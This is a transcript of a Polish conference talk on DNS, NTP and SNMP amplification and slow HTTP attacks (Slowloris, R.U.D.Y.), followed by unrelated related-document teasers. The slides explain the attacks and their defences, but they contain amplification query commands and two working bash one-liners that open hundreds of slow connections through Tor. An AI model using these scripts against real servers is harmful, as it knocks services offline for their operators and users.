Rentgen współczesnych ataków DoS. Marcin Ulikowski Network Engineer, Atos IT Services

Wielkość: px
Rozpocząć pokaz od strony:

Download "Rentgen współczesnych ataków DoS. Marcin Ulikowski Network Engineer, Atos IT Services marcin.ulikowski@atos.net marcin@ulikowski."

Transkrypt

1 Rentgen współczesnych ataków DoS Marcin Ulikowski Network Engineer, Atos IT Services

2 Distributed Reflected Denial of Service Ataki wolumetryczne (odbite wzmocnione) 2

3 3

4 4

5 Brak weryfikacji adresu źródłowego (IP spoofing) Protokół bezpołączeniowy UDP jako transport Popularna i dostępna usługa Brak autoryzacji na poziomie aplikacji Zapytanie Odpowiedź 5

6 Otwarte serwery DNS 6

7 Rozszerzenie EDNS0 Odpowiedzi >512B dig. +edns=0 +bufsize=4096 Open DNS resolver ( ) Maksymalny akceptowalny rozmiar odpowiedzi 7

8 IP (tos 0x0, ttl 64, id 5550, offset 0, flags [none], proto UDP (17), length 56) > : [1au] ANY?. (28) IP (tos 0x40, ttl 61, id 58532, offset 0, flags [+], proto UDP (17), length 1500) > : /13/22. RRSIG,. SOA a.root-servers.net. nstld.verisign-grs.com ,. RRSIG,. NS d.rootservers.net.,. NS l.root-servers.net.,. NS b.root-servers.net.,. NS k.rootservers.net.,. NS g.root-servers.net.,. NS a.root-servers.net.,. NS j.rootservers.net.,. NS h.root-servers.net.,. NS e.root-servers.net.,. NS f.rootservers.net.,. NS m.root-servers.net.,. NS c.root-servers.net.,. NS i.rootservers.net.,. RRSIG,. NSEC,. RRSIG,. DNSKEY,. DNSKEY[ domain] IP (tos 0x40, ttl 61, id 58532, offset 1480, flags [none], proto UDP (17), length 651) > : ip-proto

9 $ dig plugawyszuwarek.pl NAPTR +short +notcp +edns=0 +bufsize=4096 sort "" ".-. " "" "" " ( ) " "" "" " '-' " "" "" " J L " "" "" " " "" "" " J L " "" "" " " "" "" " J L " "" "" ".-'..'-. " "" "" " / " "" "" " _.-''' `bmw._ " "" "" ".' `. " "" "" " J `. " "" "" " F L " "" "" " J J " "" "" " J ` " "" "" " L " "" "" " " "" "" " " "" "" " J " "" "" " L " "" "" " " "" "" ", _ " "" "" ",' `''''''''' `-._ " "" "" " J `-. " "" "" " F.-' ` ' `Y8888b.`. " "" "" ".' `P' `88888b " "" "" " J # L # q8888b L " "" "" " )8888D ) " "" "" " J J d8888p P " "" "" " L `..b.,88888p / " "" "" " `. `-.,o88888o.,o88888p'.' " "" "" " `-...-' " "" "" " " "" "" " J " "" "" ".' " "" "" " J " "" "" " " "" "" " Y " "" "" " `. " "" "" " `' :....J " "" "" " " "" "" " L " "" "" " '' ' " "". 9

10 IN ANY plugawyszuwarek.pl? 10

11 11 Źródło: Open Resolver Project

12 1 Mbps /8 ( ) <ROOT> IN ANY? EDNS0 3:00h ~ Spamhaus DDoS < % rekursywnych odpowiedzi EDNS0 76% 12

13 Otwarte serwery NTP 13

14 ntpdc -c monlist Diagnostyczna komenda protokołu NTP służąca do pobrania listy do 600 ostatnich hostów z którymi łączył się serwer czasu. 14

15 $ ntpdc -n -c monlist remote address port local address count m ver rstr avgint lstint ===============================================================================

16 18:05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length

17 IP + UDP + NTP 440B (6 hostów) Max liczba pakietów Standardowa długość zapytania MON_GETLIST (payload NTP 192B) 17

18 18

19 IP 20B + UDP 8B + NTP 192B 8B 19

20 1 Mbps 57 prefiksów OVH 8B NTP MON_GETLIST 0:15h 1964 serwerów NTP 979 wspiera MON_GETLIST 20

21 Publiczne serwery SNMP 21

22 Ilość obiektów do pobrania Object ID snmpbulkget -Cr c public iso Dostępne dla SNMPv2 i SNMPv3 community string 22

23 $ snmpbulkget Cr3000 -v2c public iso iso = STRING: "Hardware: x86 Family 15 Model 79 Stepping 2 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)" iso = OID: iso iso = Timeticks: ( ) 2 days, 14:22:05.62 iso = "" iso = STRING: "MICROSOF-D48508" iso = "" iso = INTEGER: 76 iso = INTEGER: 2 iso = INTEGER: 1 iso = INTEGER: 2 iso = Hex-STRING: 4D C 6F 6F B E iso = Hex-STRING: F C E F F D F 6E F 6C 6C D 20 CC E8 ED E8 EF EE F0 F2 20 EF EB E0 ED E8 F0 EE E2 F9 E8 EA E0 20 EF E0 EA E5 F2 EE E2 00 iso = INTEGER: 24 iso = INTEGER: 6 iso = INTEGER: 1520 iso = INTEGER: 1500 iso = Gauge32: iso = Gauge32: iso = "" iso = Hex-STRING: 00 1A FC FC iso = INTEGER: 1 iso = INTEGER: 1 iso = INTEGER: 1 iso = INTEGER: 1 iso = Timeticks: (0) 0:00:00.00 (... ) iso = No more variables left in this MIB View (It is past the end of the MIB tree) 23

24 IP (tos 0x0, ttl 64, id 58102, offset 0, flags [DF], proto UDP (17), length 68) > : { SNMPv2c { GetBulk(25) R= N=0 M= } } IP (tos 0x0, ttl 122, id 60908, offset 0, flags [+], proto UDP (17), length 1500) > : [len1468<asnlen61313] IP (tos 0x0, ttl 122, id 60908, offset 1480, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 2960, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 4440, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 5920, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 7400, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 8880, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 10360, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 11840, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 13320, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 14800, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 16280, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 17760, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 19240, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 20720, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 22200, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 23680, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 25160, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 26640, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 28120, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 29600, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 31080, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 32560, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 34040, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 35520, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 37000, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 38480, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 39960, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 41440, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 42920, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 44400, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 45880, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 47360, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 48840, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 50320, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 51800, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 53280, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 54760, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 56240, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 57720, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 59200, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 60680, flags [none], proto UDP (17), length 665) > : ip-proto-17 24

25

26 1 Mbps /8 snmpbulkget v2c c public 3:00h serwerów SNMP Średnia długość odpowiedzi:

27 Wyłącz zbędne usługi Schowaj się za kimś większym (CDN) Filtrowanie ruchu (BCP-38) Rozproszone usługi Dobre relacje z ISP 27

28 Slow HTTP Denial of Service Ataki na warstwę aplikacji 28

29 Bardzo łatwe do przeprowadzenia Trudne do wykrycia przez systemy IDS Nie wymagają dużej przepustowości łącza Nie wymagają botnet-u Możliwe do ukrycia (Tor) 29

30 30

31 Slowloris 31

32 $ nc plugawyszuwarek.pl 80 GET / HTTP/1.1 Host: plugawyszuwarek.pl Connection: keep-alive Accept-Charset: utf8 Accept-language: pl, en-us User-Agent: netcat Brak pustego wiersza HTTP/ Request Time-Out 32

33 Liczba połączeń wątków HTTP Nagłówek HTTP for i in `seq 300`; do ( echo -e "GET / HTTP/1.1\nHost: plugawyszuwarek.pl" nc -X 5 -x :9050 plugawyszuwarek.pl 80 -q 300 & ) ; done Tor proxy Czas trwania sesji TCP Autor nie ponosi odpowiedzialności za niezgodne z prawem wykorzystanie powyższego kodu oraz za wszelkiego rodzaju szkody wyrządzone z jego użyciem. 33

34 R.U.D.Y (R U Dead Yet?) 34

35 $ nc plugawyszuwarek.pl 80 POST / HTTP/1.1 Host: plugawyszuwarek.pl Content-length: \r\n 1=1& 2=2& 3=3& 4=4& 5=5& 35

36 for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: plugawyszuwarek.pl\ncontent-length: \n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) nc -X 5 -x :9050 plugawyszuwarek.pl 80 & ); done Autor nie ponosi odpowiedzialności za niezgodne z prawem wykorzystanie powyższego kodu oraz za wszelkiego rodzaju szkody wyrządzone z jego użyciem. 36

37 Slow HTTP READ 37

38 38

39 Po otrzymaniu segmentu, okno TCP odbiorcy - czyli atakującego - jest pełne Rozmiar obiektu większy niż bufor nadawczy serwera Atakujący ustawia rozmiar okna TCP na 0 Serwer stara się podtrzymać sesję TCP 39

40 Czekaj na nagłówek (oraz SSL handshake) do 20s. Jeśli klient przesyła nagłówki z prędkością min. 500B/s czekaj kolejne 20s. <IfModule mod_reqtimeout.c> RequestReadTimeout header=20-40,minrate=500 body=20,minrate=500 </IfModule> Czekaj na dane do 20s. Nie przerywaj połączenia, jeśli klient dosyła dane z prędkością min. 500B/s. 40

41 41

Systemy internetowe. Wykład 5 Architektura WWW. West Pomeranian University of Technology, Szczecin; Faculty of Computer Science

Systemy internetowe. Wykład 5 Architektura WWW. West Pomeranian University of Technology, Szczecin; Faculty of Computer Science Systemy internetowe Wykład 5 Architektura WWW Architektura WWW Serwer to program, który: Obsługuje repozytorium dokumentów Udostępnia dokumenty klientom Komunikacja: protokół HTTP Warstwa klienta HTTP

Bardziej szczegółowo

Przegląd zagrożeń związanych z DNS. Tomasz Bukowski, Paweł Krześniak CERT Polska

Przegląd zagrożeń związanych z DNS. Tomasz Bukowski, Paweł Krześniak CERT Polska Przegląd zagrożeń związanych z DNS Tomasz Bukowski, Paweł Krześniak CERT Polska Warszawa, styczeń 2011 Agenda Agenda Zagrożenia w Internecie Komunikacja w DNS Zagrożenia w DNS Metody i skutki ataków Zagrożenia

Bardziej szczegółowo

XML-RPC: Zdalne wykonywanie procedur

XML-RPC: Zdalne wykonywanie procedur XML-RPC: Zdalne wykonywanie procedur Bartłomiej Świercz Katedra Mikroelektroniki i Technik Informatycznych Łódź, 28 października 2005 roku Wstęp Internet dostarcza wiele możliwości programistą piszącym

Bardziej szczegółowo

Jak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org

Jak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org Jak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org Ping flood Ping flood popularny sposób ataku na serwer internetowy polegający na przeciążeniu łącza pakietami ICMP generowanymi na przykład

Bardziej szczegółowo

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark Topologia Cele Część 1: Zapisanie informacji dotyczących konfiguracji IP komputerów Część 2: Użycie programu Wireshark do przechwycenia

Bardziej szczegółowo

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,

Bardziej szczegółowo

Ataki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW

Ataki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW Ataki na aplikacje WWW Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW Ataki na aplikację Ataki na przeglądarkę Ataki na serwer WWW/kontener, etc. Często kombinacja i wiele etapów Którędy do środka

Bardziej szczegółowo

Technologie internetowe

Technologie internetowe Protokół HTTP Paweł Rajba pawel@ii.uni.wroc.pl http://www.kursy24.eu/ Spis treści Protokół HTTP Adresy zasobów Jak korzystać z telnet? Metody protokołu HTTP Kody odpowiedzi Pola nagłówka HTTP - 2 - Adresy

Bardziej szczegółowo

1. Konfiguracja routera i PC. LABORATORIUM 3 Konfiguracja agenta SNMP. Schemat połączeń do konfiguracji komunikacji SNMP zarządca - agent:

1. Konfiguracja routera i PC. LABORATORIUM 3 Konfiguracja agenta SNMP. Schemat połączeń do konfiguracji komunikacji SNMP zarządca - agent: LABORATORIUM 3 Konfiguracja agenta SNMP Schemat połączeń do konfiguracji komunikacji SNMP zarządca - agent: 1. Uruchomić 2 komputery PC: dołączyć do jednego z nich interfejs fa 0/0 rutera, a do drugiego

Bardziej szczegółowo

Zarządzanie sieciami komputerowymi - wprowadzenie

Zarządzanie sieciami komputerowymi - wprowadzenie Zarządzanie sieciami komputerowymi - wprowadzenie Model zarządzania SNMP SNMP standardowy protokół zarządzania w sieci Internet stosowany w dużych sieciach IP (alternatywa logowanie i praca zdalna w każdej

Bardziej szczegółowo

OUTSIDE 200. 200. 200.0/24. dmz. outside 192. 168.1.0/24. security- level 50 176.16.0.0/16 TRUNK 0/1 VLAN2 0/2 VLAN10 0/3-0/10 VLAN20 0/11-0/24

OUTSIDE 200. 200. 200.0/24. dmz. outside 192. 168.1.0/24. security- level 50 176.16.0.0/16 TRUNK 0/1 VLAN2 0/2 VLAN10 0/3-0/10 VLAN20 0/11-0/24 SNMP - Simple Network Management Protocol Schemat sieci OUTSIDE 200. 200. 200.0/24 outside security- level 0 192. 168.1.0/24 dmz security- level 50 TRUNK 0/1 VLAN2 0/2 VLAN10 0/3-0/10 VLAN20 0/11-0/24

Bardziej szczegółowo

Narzędzia do diagnozowania sieci w systemie Windows

Narzędzia do diagnozowania sieci w systemie Windows Narzędzia do diagnozowania sieci w systemie Windows Polecenie ping Polecenie wysyła komunikaty ICMP Echo Request w celu weryfikacji poprawności konfiguracji protokołu TCP/IP oraz dostępności odległego

Bardziej szczegółowo

DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ

DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ INTERNET PROTOCOL (IP) INTERNET CONTROL MESSAGE PROTOCOL (ICMP) WSTĘP DO SIECI INTERNET Kraków, dn. 7 listopada 2016 r. PLAN IPv4: schemat nagłówka ICMP: informacje

Bardziej szczegółowo

Programowanie sieciowe

Programowanie sieciowe Programowanie sieciowe Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2014/2015 Michał Cieśla pok. D-2-47, email: michal.ciesla@uj.edu.pl konsultacje: środy 10-12 http://users.uj.edu.pl/~ciesla/

Bardziej szczegółowo

IP Spoofing is still alive... Adam Zabrocki http://pi3.hack.pl ( nie działa ;) ) pi3@itsec.pl (lub oficjalnie: adam@hispasec.com)

IP Spoofing is still alive... Adam Zabrocki http://pi3.hack.pl ( nie działa ;) ) pi3@itsec.pl (lub oficjalnie: adam@hispasec.com) Adam Zabrocki http://pi3.hack.pl ( nie działa ;) ) pi3@itsec.pl (lub oficjalnie: adam@hispasec.com) Mapa prezentacji: Cel wykładu... Mapa prezentacji: Cel wykładu... Spojrzenie inżynierskie: Protokół IPv4

Bardziej szczegółowo

Sieci komputerowe. Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP

Sieci komputerowe. Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP Sieci komputerowe Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP Zadania warstwy transportu Zapewnienie niezawodności Dostarczanie danych do odpowiedniej aplikacji w warstwie aplikacji (multipleksacja)

Bardziej szczegółowo

dostępu do okręslonej usługi odbywa się na podstawie tego adresu dostaniemu inie uprawniony dostep

dostępu do okręslonej usługi odbywa się na podstawie tego adresu dostaniemu inie uprawniony dostep Spoofing oznacza podszywanie się pod inną maszynę w sieci. Może wystąpić na różnych poziomach komunikacji: - sprzetowej zmiana przypisanego do karty MAC adresu jęzeli weryfikacja dostępu do okręslonej

Bardziej szczegółowo

Akademickie Centrum Informatyki PS. Wydział Informatyki PS

Akademickie Centrum Informatyki PS. Wydział Informatyki PS Akademickie Centrum Informatyki PS Wydział Informatyki PS Akademickie Centrum Informatyki Wydział Informatyki P.S. Warstwy transmisyjne Protokoły sieciowe Krzysztof Bogusławski tel. 449 41 82 kbogu@man.szczecin.pl

Bardziej szczegółowo

Ataki sieciowe Materiały pomocnicze do wykładu

Ataki sieciowe Materiały pomocnicze do wykładu Ataki sieciowe Materiały pomocnicze do wykładu Bezpieczeństwo systemów informatycznych Ataki Zbigniew Suski 1 Spoofing ARP Spoofing ARP 1 5 Bufor ARP (ARP Cache) A 2 3 B Bufor ARP (ARP Cache) 6 1. Sprawdzenie

Bardziej szczegółowo

Brakujące ogniwo w bezpieczeństwie Internetu

Brakujące ogniwo w bezpieczeństwie Internetu XXII Krajowe Sympozjum Telekomunikacji i Teleinformatyki Bydgoszcz, 13-15 września 2006 DNSSEC Brakujące ogniwo w bezpieczeństwie Internetu Krzysztof Olesik e-mail: krzysztof.olesik@nask.pl DNS Domain

Bardziej szczegółowo

Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP

Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego Topologia Cele Część 1: Przygotowanie Wireshark do przechwytywania pakietów Wybór odpowiedniego interfejsu

Bardziej szczegółowo

Protokół wymiany sentencji, wersja 1

Protokół wymiany sentencji, wersja 1 Protokół wymiany sentencji, wersja 1 Sieci komputerowe 2011@ MIM UW Osowski Marcin 28 kwietnia 2011 1 Streszczenie Dokument ten opisuje protokół przesyłania sentencji w modelu klientserwer. W założeniu

Bardziej szczegółowo

Protokół zarządzania siecią SNMP

Protokół zarządzania siecią SNMP Protokół zarządzania siecią SNMP Simple Network Management Protocol 3. (RFC 3411-3418). Starsze Wersje: SNMP 1, SNMP 2 SNMP jest protokołem wykorzystywanym do zarządzania różnymi elementami sieci (np.

Bardziej szczegółowo

Bazy Danych i Usługi Sieciowe

Bazy Danych i Usługi Sieciowe Bazy Danych i Usługi Sieciowe Sieci komputerowe Paweł Daniluk Wydział Fizyki Jesień 2012 P. Daniluk (Wydział Fizyki) BDiUS w. VI Jesień 2012 1 / 24 Historia 1 Komputery mainframe P. Daniluk (Wydział Fizyki)

Bardziej szczegółowo

MODEL WARSTWOWY PROTOKOŁY TCP/IP

MODEL WARSTWOWY PROTOKOŁY TCP/IP MODEL WARSTWOWY PROTOKOŁY TCP/IP TCP/IP (ang. Transmission Control Protocol/Internet Protocol) protokół kontroli transmisji. Pakiet najbardziej rozpowszechnionych protokołów komunikacyjnych współczesnych

Bardziej szczegółowo

Akademickie Centrum Informatyki PS. Wydział Informatyki PS

Akademickie Centrum Informatyki PS. Wydział Informatyki PS Akademickie Centrum Informatyki PS Wydział Informatyki PS Akademickie Centrum Informatyki Wydział Informatyki P.S. Warstwy transmisyjne Protokoły sieciowe Krzysztof Bogusławski tel. 449 41 82 kbogu@man.szczecin.pl

Bardziej szczegółowo

Sieci komputerowe. Wykład dr inż. Łukasz Graczykowski

Sieci komputerowe. Wykład dr inż. Łukasz Graczykowski Sieci komputerowe Wykład 5 3.04.2019 dr inż. Łukasz Graczykowski lukasz.graczykowski@pw.edu.pl Semestr letni 2018/2019 Uzyskiwanie adresu IP Do tej pory zajmowaliśmy się adresami IP oraz przepływem informacji

Bardziej szczegółowo

Programowanie współbieżne i rozproszone

Programowanie współbieżne i rozproszone Programowanie współbieżne i rozproszone WYKŁAD 6 dr inż. Komunikowanie się procesów Z użyciem pamięci współdzielonej. wykorzystywane przede wszystkim w programowaniu wielowątkowym. Za pomocą przesyłania

Bardziej szczegółowo

Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail. A. Kisiel,Protokoły DNS, SSH, HTTP, e-mail

Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail. A. Kisiel,Protokoły DNS, SSH, HTTP, e-mail N, Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail 1 Domain Name Service Usługa Domain Name Service (DNS) Protokół UDP (port 53), klient-serwer Sformalizowana w postaci protokołu DNS Odpowiada

Bardziej szczegółowo

Sieci komputerowe Warstwa aplikacji

Sieci komputerowe Warstwa aplikacji Sieci komputerowe Warstwa aplikacji 2012-05-24 Sieci komputerowe Warstwa aplikacji dr inż. Maciej Piechowiak 1 Wprowadzenie warstwa zapewniająca interfejs pomiędzy aplikacjami używanymi do komunikacji,

Bardziej szczegółowo

DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ

DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ PROTOKOŁY TCP I UDP WSTĘP DO SIECI INTERNET Kraków, dn. 12 grudnia 2016 r. PLAN TCP: cechy protokołu schemat nagłówka znane numery portów UDP: cechy protokołu

Bardziej szczegółowo

Sieci komputerowe - administracja

Sieci komputerowe - administracja Sieci komputerowe - administracja warstwa sieciowa Andrzej Stroiński andrzej.stroinski@cs.put.edu.pl http://www.cs.put.poznan.pl/astroinski/ warstwa sieciowa 2 zapewnia adresowanie w sieci ustala trasę

Bardziej szczegółowo

Laboratorium Sieci Komputerowych - 2

Laboratorium Sieci Komputerowych - 2 Laboratorium Sieci Komputerowych - 2 Analiza prostych protokołów sieciowych Górniak Jakub Kosiński Maciej 4 maja 2010 1 Wstęp Zadanie polegało na przechwyceniu i analizie komunikacji zachodzącej przy użyciu

Bardziej szczegółowo

Warstwa sieciowa. Model OSI Model TCP/IP. Aplikacji. Aplikacji. Prezentacji. Sesji. Transportowa. Transportowa

Warstwa sieciowa. Model OSI Model TCP/IP. Aplikacji. Aplikacji. Prezentacji. Sesji. Transportowa. Transportowa Warstwa sieciowa Model OSI Model TCP/IP Aplikacji Prezentacji Aplikacji podjęcie decyzji o trasowaniu (rutingu) na podstawie znanej, lokalnej topologii sieci ; - podział danych na pakiety Sesji Transportowa

Bardziej szczegółowo

Metody ataków sieciowych

Metody ataków sieciowych Metody ataków sieciowych Podstawowy podział ataków sieciowych: Ataki pasywne Ataki aktywne Ataki pasywne (passive attacks) Polegają na śledzeniu oraz podsłuchiwaniu w celu pozyskiwania informacji lub dokonania

Bardziej szczegółowo

Sieci komputerowe - Wstęp do intersieci, protokół IPv4

Sieci komputerowe - Wstęp do intersieci, protokół IPv4 Piotr Kowalski KAiTI Internet a internet - Wstęp do intersieci, protokół IPv Plan wykładu Informacje ogólne 1. Ogólne informacje na temat sieci Internet i protokołu IP (ang. Internet Protocol) w wersji.

Bardziej szczegółowo

Wybrane działy Informatyki Stosowanej

Wybrane działy Informatyki Stosowanej Wybrane działy Informatyki Stosowanej Dr inż. Andrzej Czerepicki a.czerepicki@wt.pw.edu.pl http://www2.wt.pw.edu.pl/~a.czerepicki 2017 Globalna sieć Internet Koncepcja sieci globalnej Usługi w sieci Internet

Bardziej szczegółowo

Podstawy Transmisji Danych. Wykład IV. Protokół IPV4. Sieci WAN to połączenia pomiędzy sieciami LAN

Podstawy Transmisji Danych. Wykład IV. Protokół IPV4. Sieci WAN to połączenia pomiędzy sieciami LAN Podstawy Transmisji Danych Wykład IV Protokół IPV4 Sieci WAN to połączenia pomiędzy sieciami LAN 1 IPv4/IPv6 TCP (Transmission Control Protocol) IP (Internet Protocol) ICMP (Internet Control Message Protocol)

Bardziej szczegółowo

Stos TCP/IP. Warstwa aplikacji cz.2

Stos TCP/IP. Warstwa aplikacji cz.2 aplikacji transportowa Internetu Stos TCP/IP dostępu do sieci Warstwa aplikacji cz.2 Sieci komputerowe Wykład 6 FTP Protokół transmisji danych w sieciach TCP/IP (ang. File Transfer Protocol) Pobieranie

Bardziej szczegółowo

Wprowadzenie Management Information Base (MIB) Simple Network Management Protocol (SNMP) Polecenia SNMP Narzędzia na przykładzie MIB Browser (GUI)

Wprowadzenie Management Information Base (MIB) Simple Network Management Protocol (SNMP) Polecenia SNMP Narzędzia na przykładzie MIB Browser (GUI) Wprowadzenie Management Information Base (MIB) Simple Network Management Protocol (SNMP) Polecenia SNMP Narzędzia na przykładzie MIB Browser (GUI) () SNMP - Protokół zarządzania sieciami TCP/IP. - UDP

Bardziej szczegółowo

Metody zabezpieczania transmisji w sieci Ethernet

Metody zabezpieczania transmisji w sieci Ethernet Metody zabezpieczania transmisji w sieci Ethernet na przykładzie protokołu PPTP Paweł Pokrywka Plan prezentacji Założenia Cele Problemy i ich rozwiązania Rozwiązanie ogólne i jego omówienie Założenia Sieć

Bardziej szczegółowo

Protokół HTTP 1.1 *) Wprowadzenie. Jarek Durak. rfc2616 źródło www.w3.org 1999

Protokół HTTP 1.1 *) Wprowadzenie. Jarek Durak. rfc2616 źródło www.w3.org 1999 Protokół HTTP 1.1 *) Wprowadzenie Jarek Durak * rfc2616 źródło www.w3.org 1999 HTTP Hypertext Transfer Protocol Protokół transmisji hipertekstu został zaprojektowany do komunikacji serwera WW z klientem

Bardziej szczegółowo

OSI Transport Layer. Network Fundamentals Chapter 4. Version Cisco Systems, Inc. All rights reserved. Cisco Public 1

OSI Transport Layer. Network Fundamentals Chapter 4. Version Cisco Systems, Inc. All rights reserved. Cisco Public 1 OSI Transport Layer Network Fundamentals Chapter 4 Version 4.0 1 OSI Transport Layer Network Fundamentals Rozdział 4 Version 4.0 2 Objectives Explain the role of Transport Layer protocols and services

Bardziej szczegółowo

Protokoły sterujące i warstwy aplikacji. Protokół kontrolny ICMP Internet Control Message Protocol Protokoły inicjowania i konfiguracji hostów

